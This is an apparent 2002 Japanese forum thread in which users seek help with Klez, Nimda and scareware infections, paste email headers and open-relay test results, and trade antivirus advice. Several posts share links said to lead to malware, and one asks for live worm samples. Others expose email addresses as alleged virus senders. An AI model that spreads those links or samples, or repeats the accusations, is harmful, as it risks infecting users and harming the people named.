861 :名無しさん@お腹いっぱい。:02/09/07 09:08
>>842
君と友人がウィルススキャンしてみれば判る。
両方対策ソフトなしなんていうなよ。

862 :股、北!!!!!!!!so-netから愉快堂出版を通してKlezH:02/09/07 09:50
股、北!!!!!!!!so-netから愉快堂出版を通してKlezH
KlezH
Received: from smtp.yukaido.ne.jp (210.230.82.4)
by **
Received: (qmail 40456 invoked from network); **
Received: from p294f16.kngwnt01.ap.so-net.ne.jp (218.41.79.22)
by smtp.yukaido.ne.jp with SMTP; 6 Sep 2002 18:02:40 +0900
From: ***** <_____@mail.goo.ne.jp>
To: yukaido_ne_jp_p294f16_kngwnt01_ap_so-net_ne_jp_KlezH@so-net.ne.jp
smtp_yukaido_ne_jp_218_41_79_22_KlezH@so-net.ne.jp
p294f16_kngwnt01_ap_so-net_ne_jp_KlezH@yukaido.ne.jp
218_41_79_22_KlezH@yukaido.ne.jp
210_230_82_4_p294f16_kngwnt01_ap_so-net_ne_jp_KlezH@so-net.ne.jp
Subject: Eager to see you

http://www.nanet.co.jp/rlytest/relaytest.html
smtp.yukaido.ne.jp
問題あり:不正な中継を受け付けます。
(210.230.82.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

863 :862 ホストの検索 - その他の RBL への登録状況:02/09/07 09:51
ホストの検索 - その他の RBL への登録状況
http://www.ordb.org/lookup/rbls/?host=smtp.yukaido.ne.jp
Host: smtp.yukaido.ne.jp (210.230.82.4)
http://njabl.org/cgi-bin/lookup.cgi?query=210.230.82.4

http://dsbl.org/listing.php?210.230.82.4
http://dsbl.org/message.php?id=415488
DSBL: Message Detail
Full Message:
From administrator@ne.jp Sun Apr 28 00:54:49 2002
Return-Path: <administrator@ne.jp>
Delivered-To: dsbl.org-listme@dsbl.org
Received: (qmail 17897 invoked by uid 106); 28 Apr 2002 00:54:48 -0000
Received: from unknown (HELO smtp.yukaido.ne.jp) (210.230.82.4)
by mail.ares.penguinhosting.net with SMTP; 28 Apr 2002 00:54:48 -0000
Received: (qmail 66817 invoked from network); 28 Apr 2002 09:54:34 +0900
Received: from ares.penguinhosting.net (ian@205.231.149.48)
by smtp.yukaido.ne.jp with SMTP; 28 Apr 2002 09:54:34 +0900
Message-ID: <GrhaxQRJmkSXPgKld0jaoLJODy7eFXaQ@ares.penguinhosting.net>
Date: Sun, 28 Apr 2002 :52:53 +0000
To: <listme@dsbl.org>
Subject: Open Relay Test Message

864 :名無しさん@お腹いっぱい。:02/09/07 10:48
Klez.Hキタ------------------
初めてノートンが役に立ったよ。


865 :名無しさん@お腹いっぱい。:02/09/07 12:20
>>862-863死ね

866 :名無しさん@お腹いっぱい。:02/09/07 17:47
>861さん
ありがとうございます。
ソフト持ってないので買ってきます。



867 :名無しさん@お腹いっぱい。:02/09/07 19:10
http://webzine.sunchon.ac.kr/db/BBS/board5/cl.zip
これって何ですか?解凍したらドクロのアイコンがでてきたんですけど。
ガイシュツのウイルスでしょうか?

868 :名無しさん@お腹いっぱい。:02/09/07 21:27
>>867
質問する前に自分でスキャンしましょう。

@ノートンorバスター
Aそして、フリーのアンチドート

869 :名無しさん@お腹いっぱい。:02/09/07 21:33
EZULAというファイルは、良くないものなのでしょうか?

とりあえず検索かけ全部けしといたのですが・・

870 :名無しさん@お腹いっぱい。:02/09/07 22:06
2月から毎日、ウイルス付きメールが5通位来て困っています。
対策ソフトはNISをインストールして使っています。

検出ウイルスは殆どがklez.Eで、偽装しているので送信アドレスが
証拠となりませんが、メールのソースを添付して数回、プロバイダ
(自分の契約プロバイダと送信元アドレスのプロバイダ)に
相談してみると、送信元プロバイダから「このアドレス所持者が送信元と
思われるので、警告しておきます」との回答を得ました。

しかし、依然メールは一向に減りません。こういった場合、
メールアドレスを再取得する等以外に迷惑メールを来なくする方法は
無いのでしょうか?プロバイダのウイルス除去サービスは利用しています。

Return-Path: <kouji-k@dream.o*n.ne.jp>



871 :メールヘッダは?:02/09/07 22:48
>>870
Fromと自分のメールアドレスとメールサーバーを伏せて書き込んでください。

872 :名無しさん@お腹いっぱい。:02/09/07 23:22
kouji-k@dream.o*n.ne.jpの
*をcにしてGoogleで検索してみた。

ttp://jp.apptama.com/auth/BC00000145.html
ttp://www.cybercityosaka.com/tsuruhashi/tsurushin003.htm

873 :870:02/09/07 23:32
outlookのメールを削除してしまいました。
現在出先からノートPCでのカキコミですので、
メールを全て保存してある、自宅のPCから明日にでも
カキコミしたいと思います。

>872

肯定することになってしまいますが…そうなんです。
踏み台にされているのかも知れませんが、本人は無意識でネットを
されているのでしょうか?


874 :take:02/09/07 23:47
今日クレズ付きのメールが来ました。まぁそれはよくある事なので
無視しても良いのですが、ヘッダを見ると最初のReturn-Pathにある国会議員の
HPのドメインが入っていました。さてどうしたもんでしょうか。
 いちおうその人のHPにいってフォームから忠告を送信しようとしましたが
エラーではねられました。努力はしたので、もしそこの事務所が感染源だと
しても良心は傷みませんが、下手をすると祭がはじまったりして。

 さてさて。

875 :メールヘッダは?:02/09/07 23:55
 

876 :take:02/09/07 23:58
>>875
ヘッダをはっていいのかな?
あくまでもKLEZの偽装機能によるダミーアドレスかもしれないけど。
未確認情報を流すと相手が相手だけにヤヴァイ事になりませんか?

877 :名無しさん@お腹いっぱい。:02/09/08 00:01
>>873
おれに聞かれても。
とりあえず、喫茶店に「感染してない?」って聞いてみたら?

878 :875:02/09/08 00:11
>>876
From(これは偽装)、自分のメールアドレス、自分のプロバイダの
メールサーバーのみを伏せて書き込んでください。

879 :take:02/09/08 00:30
>>878
Received: by j.asahi-net.or.jp (ATSON-1) ; 7 Sep 2002 21:01:10 +0900
Received: by aardvark (awsmtp) ; 7 Sep 2002 21:01:09 +0900
Return-Path: <********@koizumi.gr.jp>
Received: from mx2.asahi-net.or.jp (mx2.asahi-net.or.jp [202.224.39.165])
by trantula.asahi-net.or.jp (8.11.6/3.7W) with ESMTP id g87C19j24360
for < *******@asahi-net.or.jp>; Sat, 7 Sep 2002 21:01:09 +0900 (JST)
Received: from imfep03.kcom.ne.jp (imfep03.kcom.ne.jp [210.174.120.149])
by mx2.asahi-net.or.jp (Postfix) with ESMTP id 179CB6110
for < *******@asahi-net.or.jp>; Sat, 7 Sep 2002 21:01:09 +0900 (JST)
Received: from Guanr ([61.115.253.210]) by imfep03.kcom.ne.jp
(InterMail vM.4.01.03.23 201-229-121-123-20010418) with SMTP
id <20020907120100.GZXN24386.imfep03.kcom.ne.jp@Guanr>
for < *******@asahi-net.or.jp>; Sat, 7 Sep 2002 21:01:00 +0900
From: sadist7 <*******@apparenet.ne.jp>
To: *******@asahi-net.or.jp
Subject: Language
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=Uf9v03EL7Bd
Message-Id: <20020907120100.GZXN24386.imfep03.kcom.ne.jp@Guanr>
Date: Sat, 7 Sep 2002 21:01:08 +0900
Delivery-Agent: @(#)$Id: local.c,v 1.59 2000/04/24 08:01:16 atson1 Exp $ on aardvark

Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

 こんな感じでよろしいの?


880 :名無しさん@お腹いっぱい。:02/09/08 01:05
こんなのきたよ!!
タイトルなし 名前なし 全く表記なし
添付ファイル OPOKHFOP.EXE

881 :名無しさん@お腹いっぱい。:02/09/08 01:08
>>880
何故か、スコシ遠い目にナタ。。。

今日のラストシーンのゴロウさんミタイニ

882 :名無しさん@お腹いっぱい。:02/09/08 02:03
ウィルス消えません、教えて下さい。

オンラインウィルスチェックをしウイルス駆除ツールしますた。
ttp://www.trendmicro.co.jp/nimda/tool.asp

再起動しても*.eml、*.nwsが増えつづけます。

助けておながいします。

883 :名無しさん@お腹いっぱい。:02/09/08 02:36
( ´ _ゝ`)フーン

884 : :02/09/08 02:56
>>882
http://www.trendmicro.co.jp/nimda/manual.asp

手動削除も試すこと。

885 :870:02/09/08 14:13
穴だらけになってしまいましたが・・・こんな感じです。
Return-Path: <kouji-k@dream.o*n.ne.jp>
Received: from ***.ne.jp (***.ne.jp [***])
by ***.ne.jp with ESMTP id g883ter19079
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:40 +0900 (JST)
Received: from ***.ne.jp (localhost [***])
by isvw.vc.***.ne.jp (***) with ESMTP id 37A89780B
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:40 +0900 (JST)
Received: from ***.ne.jp (mspool08.***.ne.jp [***])
by ***.ne.jp (***) with ESMTP id EE8457808
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:39 +0900 (JST)
Received: (from root@localhost)
by mail.***.ne.jp id g883tdK19064
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:39 +0900 (JST)
Received: from mgate17.***.ne.jp (mgate17.***.ne.jp [***])
by ***.ne.jp with ESMTP id g883tdr19057
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:39 +0900 (JST)
Received: from smtp.dream.o*n.ne.jp (dream.o*n.ne.jp [211.6.83.50])
by mgate17.***.ne.jp with ESMTP id g883tcd06514
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:38 +0900 (JST)
Received: from Qxsnfrcwq (p0428-ip03osakakita.osaka.o*n.ne.jp [211.123.237.174])
by smtp.dream.o*n.ne.jp (Postfix) with SMTP id 87D4128F3
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:16 +0900 (JST)
From: ohta <***@***.***.ne.jp>
To: ***@***.ne.jp
Subject: CELLPADDING
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=MFj8H2h88WnS6uiQV3W88P665y1P0Jp59I5b
Message-Id: <20020908035516.87D4128F3@m-kg272p.o*n.ne.jp>
Date: Sun, 8 Sep 2002 12:55:16 +0900 (JST)
X-UIDL: LX*#!X3G!!e]*"!Y+2!!

886 :870:02/09/08 14:20
ついでに某プロバイダからの回答です・・・以前全く無くなりませんが。
(自分の契約プロバイダと違い、大変丁寧でした)


この度はお問い合わせをいただき、ありがとうございます。
***カスタマサポート担当 **と申します。

ご連絡を賜り誠に恐縮でございます。
また、大変お手数をお掛けいたしております。

この度、お客様よりお問い合わせをいただきましたウイルスメール
送信の当該者に対しましては、苦情が寄せられている旨ならびに、
ウイルス感染の恐れがあるため、ウィルス駆除ソフト等を利用して
の最新定義ファイルによるウィルスチェック、ウィルスの駆除方法に
つきまして、またインターネットへの接続はお控え頂くようご連絡を
させていただきたいと存じます。

ご迷惑をお掛けいたしておりまして誠に申し訳ございません。
***をよろしくお願いいたします。
-----
***株式会社
サービスセンタ カスタマサポート担当


887 :870:02/09/08 14:25
以前=依然のマチガイです

888 :名無しさん@お腹いっぱい。 :02/09/08 14:31
なんか添え付けされてて空白のメール来て削除したんだが、
見ただけでウィルススキャンが反応。
助かったと思ったが今日起動した瞬間突然プリンターから
ハート一文字
が紙に印刷されて出てきた

なんですかこれ?

889 :酢満!!!!!!!!!分からん!!!!!!!!!:02/09/08 17:32
>>879
エラーメッセージ
<____@koizumi.gr.jp>:
210.174.125.4 does not like recipient.
Remote host said: 550 Invalid recipient:<____@koizumi.gr.jp>
Giving up on 210.174.125.4

第三者中継調査(Third Party Relay) - 結果表示
????@210.174.125.4 を担当するメールサーバーの検査結果は以下の通りです。
210.174.125.4
<<< 220 imfep04.kcom.ne.jp ESMTP server
(InterMail vM.4.01.03.23 201-229-121-123-20010418)
正常:中継は拒否されました。

http://www.nanet.co.jp/rlytest/relaytest.html
第三者中継調査(Third Party Relay) - 結果表示

????@koizumi.gr.jp を担当するメールサーバーの検査結果は以下の通りです。

指定したメールアドレスへのメールは、以下の2のサーバが担当しています。
orig2.neweb.ne.jp (pri=10)
<<< 220 imfep01.kcom.ne.jp
ESMTP server (InterMail vM.4.01.03.23 201-229-121-123-20010418)
正常:中継は拒否されました。
orig1.neweb.ne.jp (pri=10)
<<< 220 imfep03.kcom.ne.jp ESMTP server
(InterMail vM.4.01.03.23 201-229-121-123-20010418)
正常:中継は拒否されました。

890 :名無しさん@お腹いっぱい。:02/09/08 17:34
>>889死ね死ね氏ね


891 :名無しさん@お腹いっぱい。:02/09/08 17:36
                /  ̄ ̄ ̄ ̄ \
              /               \
             /               ヽ
            /             ⊂ニニニ⊃
                       ⊂ニニニニニニニニ⊃
       
        ∧_∧ヽ(`Д´)ノ       ⊂ニニニ⊃
        ( ´_ゝ`) (>>889           /
        (  つーo皿             /
        (_ ̄)'^◎            /⊂ニニニ⊃
         |/(_)  \ ____ /
        ◎

__ ,⌒ヽ                  / ̄ ̄ ̄ ̄ ̄
    \ ' ヽ )                  | 田  田
 田 田|   ) )              | 田  田
 田 田|    )               | 田  田
 田 田|     )              | 田  田

892 : :02/09/08 17:38
>>890-891は粘着。



893 :名無しさん@お腹いっぱい。:02/09/08 17:40
不正中継とフーン
「ふ」しかあってない

894 :名無しさん@お腹いっぱい。:02/09/08 19:08
不正中継が分かったなら、対処しろよ>>889

それとも、「俺ならこんだけ分かるんだぜ」とでも思ってんのか?

895 :名無しさん@お腹いっぱい。:02/09/08 19:25
物凄く馬鹿な質問かもしれないんですがどなたか教えてください
自分はウィルスとかトロイとかネットで落とした後、必ずノートンでウィルスチェックしています
すると毎回ウィルスが検出されます
例えばsub7からはsub7が検出されます
これは正常なんでしょうか?
それともsub7にsub7が仕込まれてるとゆうことなんでしょうか?

896 :名無しさん@お腹いっぱい。:02/09/08 20:17
>>895
日本語を学習して下さい。

897 :cheshire-cat ◆CATJR.v6 :02/09/08 21:28
>>895
何がいいたいんでしょか。
大体ノートンのスキャンでヒットする時点で、テスト用の用途を除けば利用価値は無いです。

とりあえず、近所迷惑を顧みず歌ってください。
「愛を下さい! WowWow。。。。」
これで明日の朝、目がさめる時。君は今よりも幸せな、そして素敵な人生に遭遇してうろたえるでしょう。

898 :メッセ:02/09/08 21:30
今、メッセンジャーやってたらメッセンジャーの画面が40個ぐらい出てきたんですけどウイルスでしょうか?

899 :名無しさん@お腹いっぱい。:02/09/08 22:00
>>898
まずウィルスに感染していないかどうかチェックしてから聞いてください

900 :(*゚Д゚):02/09/08 23:57
先程ノートン先生より突然の警告があったのですが、
VBS.LoveLetterの感染経路はoutlookやフリーメールだけでしょうか?
どこかのページを踏んで感染ってありますか?

プロバイダーのウイルス対策もしているし、
まるで身に覚えがありません。

警告がでたのに、
スキャンしてもウイルスが検出されません。

コワイよー


901 :_:02/09/09 00:00
>>900
@マルチポストするな
Aスレッドが立ってる

902 :(*゚Д゚):02/09/09 00:05
>901
すみません。
初心者の部類なので
どこにスレッドがあるか教えてください。

903 :cheshire-cat ◆CATJR.v6 :02/09/09 00:17
>902
これ?
http://pc.2ch.net/test/read.cgi/sec/1025872269/l50

904 :名無しさん@お腹いっぱい。:02/09/09 02:25
//dms100.org/worksucks

このURLのウィルスがどういったものなのか教えて頂けませんか?
踏んでしまったんですけど今のところファイルが壊れた様子も無く
ウイルスバスターOn-Line Scanでも感染ファイルは見つからないのですが、やはり不安です
どなたかお願いします

905 : :02/09/09 06:17
>>904

なぜかうちの環境ではNAVが反応せず。Windows98IE5.5SP2定義ファイルは9/6付け
一時ファイルにもウィルスは検出されず

Antidote SuperLiteでもう一度調べてみな
http://www.vector.co.jp/soft/win95/util/se108623.html
検出力は折り紙付き

906 :名無しさん@お腹いっぱい。:02/09/09 13:47
age

907 :名無しさん@お腹いっぱい。:02/09/09 15:02

900超えたので新スレ立てますた
http://pc.2ch.net/test/read.cgi/sec/1017309416/

908 :名無しさん@お腹いっぱい。:02/09/09 15:03
>>907


909 :904:02/09/09 15:49
>>905
ありがとう
おかげで感染ファイル見つかりますた

910 :take:02/09/09 16:29
>>889
 よく分からんですが、小泉氏のサーバーが不正中継に使われてるって事?
 ウイルスの踏み台に?それはトロイか何かを仕込まれてるって事?
 検索結果を直貼りされてもすみませんがよく分かりません。
 親切ついでに解り易く教えて下さい。おねがいします。

911 :895:02/09/09 21:05
すみません質問の仕方が悪かったです
例えばsub7が欲しくてsub7をダウンロードした場合に、ウィルスチェックするとsub7ウィルスが検出されます
これが正常なのかと聞きたいんです
もしsub7からsub7ウィルスが検出される事が当たり前だとしたら
sub7にsub7を仕込んだ場合に、どうやって本物のsub7なのか、それともsub7が仕込まれたsub7なのかを見分けるのか非常に疑問です
どなたか教えてください

912 :名無しさん@お腹いっぱい。:02/09/09 22:05
895がネタだと思う人 手を上げて(´∀`)ノ

913 :名無しさん@お腹いっぱい。:02/09/10 01:34
WinMXで「ウイルス」って検索したら
「ウイルス90種類詰め合わせ」があったよ。

これって落としたひといる?
Norton、ウイルスバスタ、アンチドートとかの
ウイルススキャンの精度をたしかめてほすぃ。(自分は小心者でできやせん)

914 :名無しさん@お腹いっぱい。:02/09/10 01:52
今は使ってないWin98でウイルススキャンしたら
183ファイルも見つかった・・・どーりで不具合が出るわけだ
klezってやつが多かったような


915 :名無しさん@お腹いっぱい。:02/09/10 01:53
>>913
× (自分は小心者でできやせん)
○ (自分は面倒でできやせん)
呆れて物も言えん

916 :名無しさん@お腹いっぱい。:02/09/10 02:01
ああ、なんか「悪用現金! ウイルス90種詰合せ」って奴か
他にも120Mのウイルス rarファイルのがあるな

誰がこんなウイルスの塊を落とすんだ

917 :名無しさん@お腹いっぱい。:02/09/10 03:53
WORM_KLEZ.Hの駆除の仕方が全くわからん。
誰か駆除した事ある人いたら教えてください。

918 :名無しさん@お腹いっぱい。:02/09/10 05:08
>>917よく見ろ専用スレ立ってんだろ
Klez.E、Klez系スレッド part4
http://pc.2ch.net/test/read.cgi/sec/1030175440/

919 :名無しさん@お腹いっぱい。:02/09/10 18:40
自動接続ソフトをダウンロードしてしまいました。自分の不注意なのですが、
いくら、ダイヤルアップ接続を消しても、自動復活して、接続されてしまい
ます。ロゴは「E−Z−LIVE」というとこの自動接続なんですが、
どうしたら、完全消去できるのでしょうか?(フォーマットというのは、
なしで、お願い致します。)


920 :名無しさん@お腹いっぱい。:02/09/10 18:57
ノートンのウイルススキャンをインストールしています。
全体をスキャンしても感染はありませんでした。
この状態でも感染している可能性はあるのでしょうか?
(最近どうも不安定でして・・・・・・。)


921 :名無しさん@お腹いっぱい。:02/09/10 19:07
>>919
マルチはだめよ

>>920
定義ファイルは最新?
最新なら特に新種が出たって噂もないから感染してる可能性は極めて低い
つか、不安定になる要素の可能性としてはウィルスは最も低いと思うけど
レジストリの最適化
http://pc3.2ch.net/test/read.cgi/win/1009560159/l50
とか、デフラグ、スタートアップや常駐ソフトの見直ししてみれ


922 :名無しさん@お腹いっぱい。:02/09/10 19:10

 >921 だめってことは、もう、どうにもならないんでしょうか?
      根本ファイルを消せば(どこにあるか、わかりませんが)
      直るのでしょうか?
      それとも、ウィルスの一種なんでしょうか?
      (さっき立ち上げたら、女性の裸体がでてきた・・・)

923 :921:02/09/10 19:23
>>922
いちおう単発質問スレ立てたのは謝ったのね・・・削除依頼だしたかは知らんけど

事後処理法
http://www02.u-page.so-net.ne.jp/ya2/njkson/higai24-1.html

つかMEかXPならシステム復元で治るかも

924 :名無しさん@お腹いっぱい。:02/09/10 19:32
>>922
つか貴様PCQA板に行けって誘導されただろうが
なんでひつこく書き込むかな・・・
一生ダイヤルQ2で接続してろよ

925 :921:02/09/10 19:38
>>922
レスありがとうございます。
定義ファイルはライブアップデートを行っていますので
最新だと思います。

貼っていただいたレジストリの最適化のスレで勉強してきます。
ありがとうございました。

926 :名無しさん@お腹いっぱい。:02/09/10 19:47

>>924 いや、どこにもいってません。スレ立てずに、質問スレに、
     ということでしたので、はじめて、こちらにきました。
 
  >>923  ありがとうございます。ただ、WIN98だし、根本的に
       直るか、もうすこしやってみます。  

927 :名無しさん@お腹いっぱい。:02/09/10 19:53
>>926
いや、だから解決法はここ見れ
http://www02.u-page.so-net.ne.jp/ya2/njkson/higai24-1.html


http://pc.2ch.net/test/read.cgi/sec/1031635346/l50
オマケにここはウィルス関連スレだから板違いですよ

928 :名無しさん@お腹いっぱい。:02/09/10 20:00
ひつこく

929 :名無しさん@お腹いっぱい。:02/09/10 22:36
http://205.180.85.40/w/pc.cgi?mid=12429&sid=2148

↑こんなページが自動的に出て怖いんですけど。。。
なんででしょう。。。


930 :名無しさん@お腹いっぱい。:02/09/10 22:38
your computer's data is currently at risk.
download internet alert now!

って出ます。。


931 :名無しさん@お腹いっぱい。:02/09/10 22:48
http://images.bonzi.com/fastclick/ia9r.asp

あああ・・・。


932 :名無しさん@お腹いっぱい。:02/09/10 22:51
ようわからんけど
怖がらせて「うちのセキュリティ対策ソフト買うたら安全やで」って宣伝してるやつ
おそらくJavaScriptとかActiveXの設定切ってないんでない?

でもこれ
IPわかったらクレジットカードの番号とか盗まれるとか書いてるから
悪質な脅しに近い会社だよなぁ・・・

933 :名無しさん@お腹いっぱい。:02/09/11 10:01
>>923
さんざん、やって、やっと直りました。
  ありがとうございました。
  あとは、ウィルス付でないことを切望します。

  でも、邪悪なソフトがふえて、いやです。

934 :名無しさん@お腹いっぱい。:02/09/11 10:41
>>933
邪悪なんじゃなくおまいさんが馬鹿なだけ
よく調べもしないであやしげなダイエット食品に手を出して
肝臓障害になったりしてるのと同じ
自己防衛もできないならPCなんぞ使わんほうが幸せ

935 :名無しさん@お腹いっぱい。:02/09/11 10:54
>>933 まだいたのか。板違いスレ違いでここに書いても情報共有にならない。
適切な板に行けば過去ログに山ほど同じ例があるんだよ。
http://pc.2ch.net/test/read.cgi/pcqa/1031391849/

>>934 ハゲドウ

936 :名無しさん@お腹いっぱい。:02/09/11 12:01
3通来てるんですが、これってウィルスでしょうか?
ただのスパムメールでしょうか?
一応添付ファイルをNAVでかけてみたらウィルスらしきものを
検知したんですが、種類が分からないのです。

件名
 1.SOS
 2.Hellow,welcome to my hometown
3.Japanese lass' sexy picturers

添付ファイル
 1.2530.scr
2.Ko.scr
3.Web.pif


937 :名無しさん@お腹いっぱい。:02/09/11 12:06
>>936 NAVで「ウィルスらしきもの」?
ウィルスならウィルスってはっきり検知して検出名も出るだろ。
レポートの活動ログみろ。

938 :名無しさん@お腹いっぱい。:02/09/11 12:06
>>936
ウィルスだろうがスパムだろうが気持ち悪いものは全部PCから消せ。

939 :名無しさん@お腹いっぱい。:02/09/11 12:09
(´-`).。oO(最近アンチウィルスソフト入れてるのに、これウィルスでしょうか?と訊くヤシまででてきた)

940 :名無しさん@お腹いっぱい。:02/09/11 12:30
>>939説明書読まないでただなんとなくインストールしてるんだよ
何かあってもヘルプファイルすらみない、ましてやその企業のサイトなんて見やしない
人間肉体的とか金銭的な実害が出ないと注意深くなんてなんないのかもね・・・

941 :936:02/09/11 13:09
>937-938
ありがとう。

添付ファイルをエクスプローラーで開いてみようとしたら
ノートンが感知しました。
「W32.Klez.E@mm」というのもでした。
受信時に感知しなかったので、ウィルスかどうか分かりませんでした。

942 :メールヘッダは?:02/09/11 13:18
>>941


http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
9月6日以降に感染か?
発症のタイミング:
奇数月(1月、3月、5月、7月、9月、11月)の6日になると
ファイルの内容を0値で書き換える。

943 :名無しさん@お腹いっぱい。:02/09/11 13:52
感染してれば何かアクション起こしたときに常駐保護機能が反応するよ

944 :936:02/09/11 13:57
再度ノートンでチェックしてみましたが
感染はありませんでした。
ありがとうございました。

945 :名無しさん@お腹いっぱい。:02/09/11 19:45

  >934 935

   ありがとうございます。ここのスレ自体、勉強になりますので。

946 :名無しさん@お腹いっぱい。:02/09/11 19:55
その妙に空間を使った無意味なレイアウトやめれ。

947 :名無しさん@お腹いっぱい。:02/09/11 21:27
すみません、初心者なもので・・・

948 :名無しさん@お腹いっぱい。:02/09/11 22:22
今日の昼頃、
 差出人空白
 件名=ISO?等々の文字列
 添付なし
なメールが届きますた
これ何でしょうか?
日が日なだけにブキミです

949 :名無しさん@お腹いっぱい。:02/09/11 22:23
先ほど変なメールが来て、開封したら確認ダイアログが出ずにウイルスに感染してしまいました。
オンラインスキャンで見たところ、PE.CAW.1416なるウイルスらしいのですが、
NAVが起動できず、駆除も出来ません。
どうしたら良いのでしょうか?駆除方法はありませんか?

950 :名無しさん@お腹いっぱい。:02/09/11 22:39
>>949
ウィルスから身を守る知識のないやつがウィルス対策ソフトを導入してない時点で×
インターネットやめたほうがいいよ

951 :949:02/09/11 23:09
一応導入してます・・。メールのウイルスチェックまでは機能させてませんが。

駆除方法はありませんか?
手遅れでしたらそう言っていただけるとまだ助かるのですが・・

952 :名無しさん@お腹いっぱい。:02/09/11 23:28
体験版のウイルスバスタでもいれれば?

953 :_:02/09/11 23:33
>>951
メールのウィルスチェック機能を起動をさせろ
パターンファイルを更新しろ
情報は小出しにするな

954 :名無しさん@お腹いっぱい。:02/09/12 00:33
>>952
アップデートできないので意味なしです。

955 :名無しさん@お腹いっぱい。:02/09/12 08:19
感染者がどうなったが知らんが
かなり前のウィルスっぽいから体験版でも充分いけると思うが
あとはBitDefenderFreeEditionとか

しかしウィルス対策ソフトが入ってるなら感染した時点で発動するはずだが・・・
常駐切ってるような馬鹿は逝ってよし、と

956 :名無しさん@お腹いっぱい。:02/09/12 10:44
http://www.so-net.ne.jp/srs-dx/
このページの下のほうが変な表示です。
ウイルスですか?

957 :名無しさん@お腹いっぱい。:02/09/12 10:47
そうです。

958 :956:02/09/12 10:56
>>957
ノートンがウイルス反応しないのです(アップデート済)
ウイルス名を教えてください。


959 :名無しさん@お腹いっぱい。:02/09/12 11:02
>>956 ソース見ろよ。</html>のうしろ

960 :名無しさん@お腹いっぱい。:02/09/12 11:02
oji333@hotmail.comて奴から、件名「W32.Klez.E removal tools」なる
メールが来たが、多分これウィルスなんだろな。
ウィルスメール来たの初めてだ。

961 :名無しさん@お腹いっぱい。:02/09/12 11:06
>>960
26歳・男性

962 : ◆tHfDbgsU :02/09/12 11:20
新スレたてました

☆ウィルス情報&質問 総合スレッド☆part6
http://pc.2ch.net/test/read.cgi/sec/1031796923/l50

963 :メールヘッダは?:02/09/12 14:25
>>960

964 :名無しさん@お腹いっぱい。:02/09/12 14:39
>>17
それは****を修正して***を見直すんだ

965 :名無しさん@お腹いっぱい。:02/09/12 15:11
検証のために
W32.Hunch.H@mm
W32.Hunch.I@mm
が必要になったんですけど、どこかにありませんでしょうか?

すみませんがよろしくお願いします。

966 : :02/09/12 19:28
埋め立てCHU!!

967 :名無しさん@お腹いっぱい。:02/09/12 20:08
>>966
使い切れ

968 :870:02/09/17 00:14
shuuka@a3.shes.net(本日3通)
kouji-k@dream.ocn.ne.jp(5通)

ウイルスメール送ってくるのいい加減やめて欲しい。
後者は直接メールしたけど、全然返事無かった・・・。

969 :名無しさん@お腹いっぱい。:02/09/17 00:20
過去スレageるのいい加減やめて欲しい。
日記書き綴るのいい加減やめて欲しい。
愚痴こぼすのいい加減やめて欲しい。

970 :sage:02/09/17 00:40
sage

971 :名無しさん@お腹いっぱい。:02/09/17 02:38
>>968
もっと勉強してからこいやばかたれ。

972 :名無しさん@お腹いっぱい。:02/09/17 12:16
メールアドレス晒してるのに
まだあぼーんされないな

973 :名無しさん@お腹いっぱい。:02/09/17 12:50
削除依頼もないのにあぼーんされるのか?

974 :名無しさん@お腹いっぱい。:02/09/18 19:32
つかおまいら埋め立てろよ

975 :名無しさん@お腹いっぱい。:02/10/22 20:45
umeume

976 :名無しさん@お腹いっぱい。:02/11/11 01:25
埋め立て

977 :YUKI:02/11/11 17:55
http://moguri9.hp.infoseek.co.jp/naruta.html
↑私のサイトです見にきてね(ウィルス送ったら殺すw)
まぁ無理だけど

978 :名無しさん@お腹いっぱい。:02/11/11 18:00
終わったスレあげるな。氏ね。>977

☆ウィルス情報&質問 総合スレッド☆part6
http://pc.2ch.net/test/read.cgi/sec/1031796923/l50
☆ウィルス情報&質問 総合スレッド☆part7
http://pc.2ch.net/test/read.cgi/sec/1035401865/l50

979 :名無しさん@お腹いっぱい。:02/11/11 20:52


980 :名無しさん@お腹いっぱい。:02/11/11 20:57
オンラインウイルススキャンっていうのをやったら1000個程のファイルがウイルスに感染してる
ことが分かりました。で、このファイルを全て削除するとまずいことが起こったりするのですか?
たしかウイルスの種類は「WARM」とか書いてあったような気がします。

981 :名無しさん@お腹いっぱい。:02/11/11 20:59
さげさげ

982 :dame:02/11/11 21:02
だめ?

983 :sage:02/11/11 21:05
つ〜か、うめきれんのか....

984 :名無しさん@お腹いっぱい。:02/11/11 21:14
a

985 :名無しさん@お腹いっぱい。:02/11/11 21:27
985

986 :名無しさん@お腹いっぱい。:02/11/11 21:34
あさげ

987 :名無しさん@お腹いっぱい。:02/11/11 21:47

                アヒャ モナー ハヤクウメタテロ!!
        __∧ ∧
       /\  (*゚∀゚)\
       \/| ̄∪∪ ̄|\
         \|_〓〓_|

988 :名無しさん@お腹いっぱい。:02/11/11 21:49

   λ_λ    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ( `ー´) < 今、TBSのドラマに故・伊藤俊人さんがでてるんじゃネーノ?
   /   ノつ  \__________
  (人_つ_つ

989 :名無しさん@お腹いっぱい。:02/11/11 21:58
  ∧_∧  
 <丶`∀´>  オマイラも埋め立てに協力するニダ!!
 (    )
 | | |  
 〈_フ__フ

990 :sage:02/11/11 22:27
う・め・た・て・ろ!

991 :sage:02/11/11 22:30
☆ウィルス情報&質問 総合スレッド☆part7
http://pc.2ch.net/test/read.cgi/sec/1035401865/l50

☆ウィルス情報&質問 総合スレッド☆part7
http://pc.2ch.net/test/read.cgi/sec/1035401865/l50

☆ウィルス情報&質問 総合スレッド☆part7
http://pc.2ch.net/test/read.cgi/sec/1035401865/l50


992 :sage:02/11/11 22:31
いど〜しる!

☆ウィルス情報&質問 総合スレッド☆part7
http://pc.2ch.net/test/read.cgi/sec/1035401865/l50


993 :sage:02/11/11 22:33
うめ〜

994 :名無しさん@お腹いっぱい。:02/11/11 22:33

        ___
    / \  \
    | ハ .| ̄ ̄|
